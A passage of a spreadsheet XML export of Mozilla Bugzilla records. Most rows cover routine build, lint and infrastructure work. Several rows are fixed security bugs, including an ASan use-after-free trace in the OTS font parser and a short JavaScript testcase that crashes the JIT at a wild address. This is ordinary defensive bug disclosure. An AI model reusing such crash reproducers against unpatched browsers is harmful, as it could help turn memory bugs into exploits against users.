script-src 'nonce-*******' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'none';report-uri /o/cspreport
```
From what I can tell from https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src#strict-dynamic, this may be part of a browser compatibility technique to have CSP headers that work on old and new browsers.
Ideally we don't have any console errors, but I can't see much we can do here that doesn't involve a larger change like moving off of the current login system. But maybe there's other options?</t>
        </is>
      </c>
      <c r="X1969" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1970">
      <c r="A1970" t="n">
        <v>560191</v>
      </c>
      <c r="B1970" t="inlineStr">
        <is>
          <t>2010-04-19 03:42:13 -0700</t>
        </is>
      </c>
      <c r="C1970" t="inlineStr">
        <is>
          <t>testsUrl not set for some SendChangeSteps</t>
        </is>
      </c>
      <c r="D1970" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1970" t="n">
        <v>1</v>
      </c>
      <c r="F1970" t="n">
        <v>1</v>
      </c>
      <c r="G1970" t="n">
        <v>5</v>
      </c>
      <c r="H1970" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1970" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1970" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1970" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1970" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1970" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1970" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1970" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1970" t="inlineStr">
        <is>
          <t>[perma-orange]</t>
        </is>
      </c>
      <c r="Q1970" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1970" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1970" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1970" t="n">
        <v>1</v>
      </c>
      <c r="U1970" t="n">
        <v>0</v>
      </c>
      <c r="V1970" t="n">
        <v>19</v>
      </c>
      <c r="W1970" t="inlineStr">
        <is>
          <t>See sendchange_4 and others (first 3 are OK)
http://production-master02.build.mozilla.org:8010/builders/Linux%20mozilla-1.9.1%20nightly/builds/255
[Failure instance: Traceback: &lt;type 'exceptions.KeyError'&gt;: 'testsUrl'
/tools/twisted-8.0.1/lib/python2.5/site-packages/twisted/internet/defer.py:194:addCallback
/tools/twisted-8.0.1/lib/python2.5/site-packages/twisted/internet/defer.py:185:addCallbacks
/tools/twisted-8.0.1/lib/python2.5/site-packages/twisted/internet/defer.py:323:_runCallbacks
/tools/buildbot-production/lib/python2.5/site-packages/buildbot-0.7.10p1-py2.5.egg/buildbot/process/buildstep.py:712:_startStep_2
--- &lt;exception caught here&gt; ---
/tools/buildbotcustom/buildbotcustom/steps/misc.py:298:start
/tools/buildbot-production/lib/python2.5/site-packages/buildbot-0.7.10p1-py2.5.egg/buildbot/process/properties.py:88:render
/tools/buildbot-production/lib/python2.5/site-packages/buildbot-0.7.10p1-py2.5.egg/buildbot/process/properties.py:86:render
/tools/buildbot-production/lib/python2.5/site-packages/buildbot-0.7.10p1-py2.5.egg/buildbot/process/properties.py:156:render
/tools/buildbot-production/lib/python2.5/site-packages/buildbot-0.7.10p1-py2.5.egg/buildbot/process/properties.py:131:__getitem__
/tools/buildbot-production/lib/python2.5/site-packages/buildbot-0.7.10p1-py2.5.egg/buildbot/process/properties.py:42:__getitem__
]
I suspect the following changeset: 
http://hg.mozilla.org/build/buildbotcustom/rev/e02144446979</t>
        </is>
      </c>
      <c r="X1970" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1971">
      <c r="A1971" t="n">
        <v>1371293</v>
      </c>
      <c r="B1971" t="inlineStr">
        <is>
          <t>2017-06-08 07:50:29 -0700</t>
        </is>
      </c>
      <c r="C1971" t="inlineStr">
        <is>
          <t>Upgrade to ESLint 4</t>
        </is>
      </c>
      <c r="D1971" t="inlineStr">
        <is>
          <t>2022-08-17 14:00:53 -0700</t>
        </is>
      </c>
      <c r="E1971" t="n">
        <v>1</v>
      </c>
      <c r="F1971" t="n">
        <v>1</v>
      </c>
      <c r="G1971" t="n">
        <v>7</v>
      </c>
      <c r="H1971" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1971" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J1971" t="inlineStr">
        <is>
          <t>Lint and Formatting</t>
        </is>
      </c>
      <c r="K1971" t="inlineStr">
        <is>
          <t>3 Branch</t>
        </is>
      </c>
      <c r="L1971" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1971" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1971" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1971" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1971" t="inlineStr"/>
      <c r="Q1971" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1971" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1971" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T1971" t="n">
        <v>1</v>
      </c>
      <c r="U1971" t="n">
        <v>0</v>
      </c>
      <c r="V1971" t="n">
        <v>52</v>
      </c>
      <c r="W1971" t="inlineStr">
        <is>
          <t>ESLint 4 is in pre-release, I've already played around with it a little bit, but we should start investigating what we need to do to upgrade when it is released.
So far I've found:
- The indent rule is more strict (there's a backwards-compatible option available).
- Our importing globals code doesn't work due to a change of how comments are handled within code.
I've started looking at the importing globals issue, I'll post here when I have some more updates.</t>
        </is>
      </c>
      <c r="X1971" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1972">
      <c r="A1972" t="n">
        <v>1164868</v>
      </c>
      <c r="B1972" t="inlineStr">
        <is>
          <t>2015-05-14 07:52:55 -0700</t>
        </is>
      </c>
      <c r="C1972" t="inlineStr">
        <is>
          <t>split buildapi celery queue into pending/running/builds4hr</t>
        </is>
      </c>
      <c r="D1972" t="inlineStr">
        <is>
          <t>2015-05-21 08:08:25 -0700</t>
        </is>
      </c>
      <c r="E1972" t="n">
        <v>1</v>
      </c>
      <c r="F1972" t="n">
        <v>1</v>
      </c>
      <c r="G1972" t="n">
        <v>7</v>
      </c>
      <c r="H1972" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1972" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1972" t="inlineStr">
        <is>
          <t>Treeherder: Data Ingestion</t>
        </is>
      </c>
      <c r="K1972" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1972" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1972" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1972" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1972" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1972" t="inlineStr"/>
      <c r="Q1972" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1972" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1972" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1972" t="n">
        <v>1</v>
      </c>
      <c r="U1972" t="n">
        <v>0</v>
      </c>
      <c r="V1972" t="n">
        <v>4</v>
      </c>
      <c r="W1972" t="inlineStr">
        <is>
          <t>This will give us better visibility into memory usage in heroku.  When looking at this yesterday, Mauro and I saw a significant memory leak somewhere in that task.  Splitting this up will give more insight.</t>
        </is>
      </c>
      <c r="X1972" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1973">
      <c r="A1973" t="n">
        <v>1098497</v>
      </c>
      <c r="B1973" t="inlineStr">
        <is>
          <t>2014-11-13 11:11:58 -0800</t>
        </is>
      </c>
      <c r="C1973" t="inlineStr">
        <is>
          <t>Heap-use-after-free in ots::ots_gasp_parse</t>
        </is>
      </c>
      <c r="D1973" t="inlineStr">
        <is>
          <t>2024-05-30 08:38:23 -0700</t>
        </is>
      </c>
      <c r="E1973" t="n">
        <v>1</v>
      </c>
      <c r="F1973" t="n">
        <v>1</v>
      </c>
      <c r="G1973" t="n">
        <v>3</v>
      </c>
      <c r="H1973" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1973" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1973" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K1973" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1973" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1973" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1973" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1973" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1973" t="inlineStr">
        <is>
          <t>[adv-main36+]</t>
        </is>
      </c>
      <c r="Q1973" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1973" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1973" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T1973" t="n">
        <v>1</v>
      </c>
      <c r="U1973" t="n">
        <v>0</v>
      </c>
      <c r="V1973" t="n">
        <v>13</v>
      </c>
      <c r="W1973" t="inlineStr">
        <is>
          <t>Created attachment 8522407
repro-file.html
Tested on:
OS: Ubuntu 14.04
Firefox: ASAN build from https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/1415892131/
ASAN-trace:
==7261==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000128cb0 at pc 0x7f369587823a bp 0x7fff0897db50 sp 0x7fff0897db48
READ of size 2 at 0x603000128cb0 thread T0 (Web Content)
    #0 0x7f3695878239 in ots::ots_gasp_parse(ots::OpenTypeFile*, unsigned char const*, unsigned long) /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/ots/src/gasp.cc:36:0
    #1 0x7f36958d8955 in (anonymous namespace)::ProcessGeneric(ots::OpenTypeFile*, unsigned int, ots::OTSStream*, unsigned char const*, unsigned long, std::vector&lt;(anonymous namespace)::OpenTypeTable, std::allocator&lt;(anonymous namespace)::OpenTypeTable&gt; &gt; const&amp;, ots::Buffer&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/ots/src/ots.cc:590:0
    #2 0x7f36958d0411 in (anonymous namespace)::ProcessTTF(ots::OpenTypeFile*, ots::OTSStream*, unsigned char const*, unsigned long) /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/ots/src/ots.cc:237:0
    #3 0x7f36958cd7a5 in ots::OTSContext::Process(ots::OTSStream*, unsigned char const*, unsigned long) /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/ots/src/ots.cc:824:0
    #4 0x7f36902d64f3 in gfxUserFontEntry::SanitizeOpenTypeData(unsigned char const*, unsigned int, unsigned int&amp;, gfxUserFontType) /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/thebes/gfxUserFontSet.cpp:253:0
    #5 0x7f36902daa19 in gfxUserFontEntry::LoadPlatformFont(unsigned char const*, unsigned int&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/thebes/gfxUserFontSet.cpp:600:0
    #6 0x7f36902d79d4 in gfxUserFontEntry::LoadNextSrc() /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/thebes/gfxUserFontSet.cpp:488:0
    #7 0x7f36902de94f in Load /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/thebes/gfxUserFontSet.cpp:686:0
    #8 0x7f36902de94f in gfxUserFontSet::FindUserFontEntryAndLoad(gfxFontFamily*, gfxFontStyle const&amp;, bool&amp;, bool&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/thebes/gfxUserFontSet.cpp:891:0
.
.
.
0x603000128cb0 is located 0 bytes inside of 32-byte region [0x603000128cb0,0x603000128cd0)
freed by thread T0 (Web Content) here:
    #0 0x471721 in free _asan_rtl_:0
    #1 0x7f3695877913 in ~OpenTypeGASP /builds/slave/m-cen-l64-asan-000000000000000/build/obj-firefox/gfx/ots/src/../../../dist/include/mozilla/mozalloc.h:232:0
    #2 0x7f3695877913 in ots::ots_gasp_parse(ots::OpenTypeFile*, unsigned char const*, unsigned long) /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/ots/src/gasp.cc:36:0
    #3 0x7f36958d8955 in (anonymous namespace)::ProcessGeneric(ots::OpenTypeFile*, unsigned int, ots::OTSStream*, unsigned char const*, unsigned long, std::vector&lt;(anonymous namespace)::OpenTypeTable, std::allocator&lt;(anonymous namespace)::OpenTypeTable&gt; &gt; const&amp;, ots::Buffer&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/ots/src/ots.cc:590:0
    #4 0x7f36958d0411 in (anonymous namespace)::ProcessTTF(ots::OpenTypeFile*, ots::OTSStream*, unsigned char const*, unsigned long) /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/ots/src/ots.cc:237:0
    #5 0x7f36958cd7a5 in ots::OTSContext::Process(ots::OTSStream*, unsigned char const*, unsigned long) /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/ots/src/ots.cc:824:0
    #6 0x7f36902d64f3 in gfxUserFontEntry::SanitizeOpenTypeData(unsigned char const*, unsigned int, unsigned int&amp;, gfxUserFontType) /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/thebes/gfxUserFontSet.cpp:253:0
.
.
.</t>
        </is>
      </c>
      <c r="X1973" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1974">
      <c r="A1974" t="n">
        <v>551894</v>
      </c>
      <c r="B1974" t="inlineStr">
        <is>
          <t>2010-03-11 23:01:29 -0800</t>
        </is>
      </c>
      <c r="C1974" t="inlineStr">
        <is>
          <t>Request to move Solaris contrib. builds for Thunderbird 3.1b1 to bouncer</t>
        </is>
      </c>
      <c r="D1974" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1974" t="n">
        <v>1</v>
      </c>
      <c r="F1974" t="n">
        <v>1</v>
      </c>
      <c r="G1974" t="n">
        <v>5</v>
      </c>
      <c r="H1974" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1974" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1974" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1974" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1974" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1974" t="inlineStr">
        <is>
          <t>Solaris</t>
        </is>
      </c>
      <c r="N1974" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1974" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1974" t="inlineStr"/>
      <c r="Q1974" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1974" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1974" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1974" t="n">
        <v>1</v>
      </c>
      <c r="U1974" t="n">
        <v>0</v>
      </c>
      <c r="V1974" t="n">
        <v>2</v>
      </c>
      <c r="W1974" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #549874 +++
solaris-sparc:
/thunderbird/releases/3.1b1/contrib/solaris_tarball/thunderbird-3.1b1.en-US.solaris-10-fcs-sparc.tar.bz2
solaris-i386:
/thunderbird/releases/3.1b1/contrib/solaris_tarball/thunderbird-3.1b1.en-US.solaris-10-fcs-i386.tar.bz2
opensolaris-sparc:
/thunderbird/releases/3.1b1/contrib/solaris_tarball/thunderbird-3.1b1.en-US.opensolaris-sparc.tar.bz2
opensolaris-i386:
/thunderbird/releases/3.1b1/contrib/solaris_tarball/thunderbird-3.1b1.en-US.opensolaris-i386.tar.bz2
The partial MAR for (3.1a1 to 3.1b1):
/thunderbird/releases/3.1b1/contrib/solaris_tarball/thunderbird-3.1a1-3.1b1.en-US.solaris-10-fcs-sparc.partial.mar
/thunderbird/releases/3.1b1/contrib/solaris_tarball/thunderbird-3.1a1-3.1b1.en-US.solaris-10-fcs-i386.partial.mar
/thunderbird/releases/3.1b1/contrib/solaris_tarball/thunderbird-3.1a1-3.1b1.en-US.opensolaris-sparc.partial.mar
/thunderbird/releases/3.1b1/contrib/solaris_tarball/thunderbird-3.1a1-3.1b1.en-US.opensolaris-i386.partial.mar
The complete MAR for 3.1b1:
/thunderbird/releases/3.1b1/contrib/solaris_tarball/thunderbird-3.1b1.en-US.solaris-10-fcs-sparc.complete.mar
/thunderbird/releases/3.1b1/contrib/solaris_tarball/thunderbird-3.1b1.en-US.solaris-10-fcs-i386.complete.mar
/thunderbird/releases/3.1b1/contrib/solaris_tarball/thunderbird-3.1b1.en-US.opensolaris-sparc.complete.mar
/thunderbird/releases/3.1b1/contrib/solaris_tarball/thunderbird-3.1b1.en-US.opensolaris-i386.complete.mar
Thanks!</t>
        </is>
      </c>
      <c r="X1974" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1975">
      <c r="A1975" t="n">
        <v>1513486</v>
      </c>
      <c r="B1975" t="inlineStr">
        <is>
          <t>2018-12-12 02:05:07 -0800</t>
        </is>
      </c>
      <c r="C1975" t="inlineStr">
        <is>
          <t>Remove gzipped runnable jobs support once enough time has passed since bug 1423215</t>
        </is>
      </c>
      <c r="D1975" t="inlineStr">
        <is>
          <t>2021-12-05 14:50:08 -0800</t>
        </is>
      </c>
      <c r="E1975" t="n">
        <v>1</v>
      </c>
      <c r="F1975" t="n">
        <v>1</v>
      </c>
      <c r="G1975" t="n">
        <v>7</v>
      </c>
      <c r="H1975" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1975" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1975" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K1975" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1975" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1975" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1975" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1975" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1975" t="inlineStr"/>
      <c r="Q1975" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1975" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1975" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1975" t="n">
        <v>1</v>
      </c>
      <c r="U1975" t="n">
        <v>0</v>
      </c>
      <c r="V1975" t="n">
        <v>4</v>
      </c>
      <c r="W1975" t="inlineStr">
        <is>
          <t>Bug 1423215 made tasks upload both the old and new style runnable jobs file, then bug 1494750 added Treeherder support for the new style file.
Once enough time has passed (eg so that the majority of try pushes have a base that includes the changes in bug 1423215), support for the old style file can be removed from Treeherder.
The old file handling parts that can be cleaned up are here:
https://github.com/mozilla/treeherder/blob/e69b3f01804de91028cbe7b4e263f4977ff45699/ui/models/runnableJob.js#L16-L25
https://github.com/mozilla/treeherder/blob/e69b3f01804de91028cbe7b4e263f4977ff45699/treeherder/etl/runnable_jobs.py#L37-L47
https://github.com/mozilla/treeherder/blob/e69b3f01804de91028cbe7b4e263f4977ff45699/treeherder/etl/runnable_jobs.py#L67-L79
In addition:
* fetch_json()'s support for `force_gzip_decompression` can be removed (https://github.com/mozilla/treeherder/blob/e69b3f01804de91028cbe7b4e263f4977ff45699/treeherder/etl/common.py#L35-L43)
* the runnable jobs API can be removed:
  - https://github.com/mozilla/treeherder/blob/e69b3f01804de91028cbe7b4e263f4977ff45699/treeherder/webapp/api/runnable_jobs.py
  - https://github.com/mozilla/treeherder/blob/e69b3f01804de91028cbe7b4e263f4977ff45699/treeherder/webapp/api/urls.py#L31-L35
* Several parts of runnable_jobs.py and SETA can be simplified, since they will only ever be fetching the most recent task ID</t>
        </is>
      </c>
      <c r="X1975" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1976">
      <c r="A1976" t="n">
        <v>1255949</v>
      </c>
      <c r="B1976" t="inlineStr">
        <is>
          <t>2016-03-11 19:05:07 -0800</t>
        </is>
      </c>
      <c r="C1976" t="inlineStr">
        <is>
          <t>Crash [@ ??] with weird memory address</t>
        </is>
      </c>
      <c r="D1976" t="inlineStr">
        <is>
          <t>2016-09-22 17:19:35 -0700</t>
        </is>
      </c>
      <c r="E1976" t="n">
        <v>1</v>
      </c>
      <c r="F1976" t="n">
        <v>1</v>
      </c>
      <c r="G1976" t="n">
        <v>3</v>
      </c>
      <c r="H1976" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1976" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1976" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1976" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1976" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1976" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1976" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1976" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1976" t="inlineStr">
        <is>
          <t>[jsbugmon:update,bisect][fuzzblocker][adv-main46+][adv-esr45.1+]</t>
        </is>
      </c>
      <c r="Q1976" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1976" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1976" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T1976" t="n">
        <v>1</v>
      </c>
      <c r="U1976" t="n">
        <v>0</v>
      </c>
      <c r="V1976" t="n">
        <v>16</v>
      </c>
      <c r="W1976" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 3a11a57b43aa (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug, run with --fuzzing-safe --ion-offthread-compile=off --ion-eager):
a = [1, 2, 3, 4, 5];
function foo4(x, m, n) {
    v = 0;
    for (var i = m; i &lt; n; i++)
      v += x[i] + x[i - 1] + x[i - 2];
    return v
}
for (i = 0; i &lt; 5; i++) 
  foo4(a, 2, 5);
foo4('xxxxxxxxxxxxx', 0, 5);
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7fc12ae in ?? ()
#0  0x00007ffff7fc12ae in ?? ()
#1  0x00007ffff7e00b68 in ?? ()
#2  0x0000000900000000 in ?? ()
#3  0x00007ffff7fe8bcd in ?? ()
#4  0x0000000000001044 in ?? ()
#5  0x00007ffff7e6d162 in ?? ()
#6  0x0000000000000000 in ?? ()
rax	0x7ffff7e00b68	140737352043368
rbx	0x5	5
rcx	0x7ffff7e8a070	140737352605808
rdx	0x7ffff7e82c90	140737352576144
rsi	0x7ffff7e82c88	140737352576136
rdi	0xc	12
rbp	0x0	0
rsp	0x7fffffffcca0	140737488342176
r8	0x0	0
r9	0xffffffff	4294967295
r10	0x7ffff3300050	140737273397328
r11	0x7ffff695d1e8	140737330401768
r12	0x0	0
r13	0x0	0
r14	0x1044	4164
r15	0x7fffffffcd50	140737488342352
rip	0x7ffff7fc12ae	140737353880238
=&gt; 0x7ffff7fc12ae:	movzbl (%rdx,%r9,1),%edx
   0x7ffff7fc12b3:	cmp    $0x100,%edx
Marking s-s because this crashes with a weird memory address. Also marking as fuzzblocker because there is practically nothing a signature could reliably match on.</t>
        </is>
      </c>
      <c r="X1976" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1977">
      <c r="A1977" t="n">
        <v>1232785</v>
      </c>
      <c r="B1977" t="inlineStr">
        <is>
          <t>2015-12-15 13:04:27 -0800</t>
        </is>
      </c>
      <c r="C1977" t="inlineStr">
        <is>
          <t>[SECURITY] Buglists in CSV format can be parsed as valid javascript in some browsers</t>
        </is>
      </c>
      <c r="D1977" t="inlineStr">
        <is>
          <t>2024-05-30 09:07:58 -0700</t>
        </is>
      </c>
      <c r="E1977" t="n">
        <v>1</v>
      </c>
      <c r="F1977" t="n">
        <v>1</v>
      </c>
      <c r="G1977" t="n">
        <v>4</v>
      </c>
      <c r="H1977" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1977" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1977" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K1977" t="inlineStr">
        <is>
          <t>2.17.1</t>
        </is>
      </c>
      <c r="L1977" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1977" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1977" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1977" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1977" t="inlineStr">
        <is>
          <t>ES 6 `-strings + no MIME restrictions on script src + no support for x-content-options: nosniff</t>
        </is>
      </c>
      <c r="Q1977" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1977" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1977" t="inlineStr">
        <is>
          <t>Bugzilla 4.2</t>
        </is>
      </c>
      <c r="T1977" t="n">
        <v>1</v>
      </c>
      <c r="U1977" t="n">
        <v>0</v>
      </c>
      <c r="V1977" t="n">
        <v>107</v>
      </c>
      <c r="W1977" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Steps to reproduce:
Hey,
I'll explain it in the next comment.
Cheers,</t>
        </is>
      </c>
      <c r="X1977" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1978">
      <c r="A1978" t="n">
        <v>905382</v>
      </c>
      <c r="B1978" t="inlineStr">
        <is>
          <t>2013-08-14 14:14:38 -0700</t>
        </is>
      </c>
      <c r="C1978" t="inlineStr">
        <is>
          <t>Data race in Paris Bindings due to use of xpc::StringToJsval</t>
        </is>
      </c>
      <c r="D1978" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E1978" t="n">
        <v>1</v>
      </c>
      <c r="F1978" t="n">
        <v>1</v>
      </c>
      <c r="G1978" t="n">
        <v>3</v>
      </c>
      <c r="H1978" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1978" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1978" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1978" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1978" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1978" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1978" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1978" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1978" t="inlineStr">
        <is>
          <t>[qa-][adv-main26+][adv-esr24.2+]</t>
        </is>
      </c>
      <c r="Q1978" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1978" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1978" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T1978" t="n">
        <v>1</v>
      </c>
      <c r="U1978" t="n">
        <v>0</v>
      </c>
      <c r="V1978" t="n">
        <v>83</v>
      </c>
      <c r="W1978" t="inlineStr">
        <is>
          <t>xpc::StringToJsval uses some static variables. When used from multiple threads this causes problems.
Here's the stack:
xul.dll!StringBufferToJSVal - xpcpublic.h:214
xul.dll!ReadableToJSVal - xpcstring.cpp:71
xul.dll!NonVoidStringToJsval - xpcquickstubs.cpp:791
xul.dll!NonVoidStringToJsval - xpcpublic.h:291
xul.dll!get_responseText - xmlhttprequestbinding.cpp:2492
xul.dll!genericGetter - xmlhttprequestbinding.cpp:2769
mozjs.dll!CallJSNative - jscntxtinlines.h:218
mozjs.dll!Invoke - interpreter.cpp:489
mozjs.dll!Invoke - interpreter.cpp:539
mozjs.dll!InvokeGetterOrSetter - interpreter.cpp:610
mozjs.dll!get - shape-inl.h:256
